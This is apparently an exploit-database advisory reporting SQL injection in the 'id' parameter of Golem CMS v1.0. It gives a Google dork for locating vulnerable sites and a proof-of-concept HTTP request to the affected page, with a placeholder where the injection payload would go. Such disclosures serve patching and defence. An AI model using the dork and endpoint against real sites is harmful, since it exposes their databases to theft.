Golem [CMS] v1.0 - SQL Injection

2018.04.17
Credit: TukangSihir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Golem [CMS] v1.0 - SQL Injection # Google Dork: inurl:cms-admin # Date: 2018 April 17 # Exploit Author: TukangSihir # Vendor Homepage: http://www.spaziogrezzo.it/ # Version: 1.0 # Tested on: Ubuntu 1. Description not validate or sanitize at the parameters "id", so attacker can do SQL-Injection vulnerablities, and attacker can see the database #####POC##### GET /it/eventi-dettaglio.php?id=[SQLi] HTTP/1.1 Host: [target] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: [target] Cookie: displayCookieConsent=y; _ga=GA1.2.353727022.1523902983; _gid=GA1.2.999499184.1523902983; PHPSESSID=lps0dkpciu5pss5fubomah7116 Connection: close Upgrade-Insecure-Requests: 1 #############


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top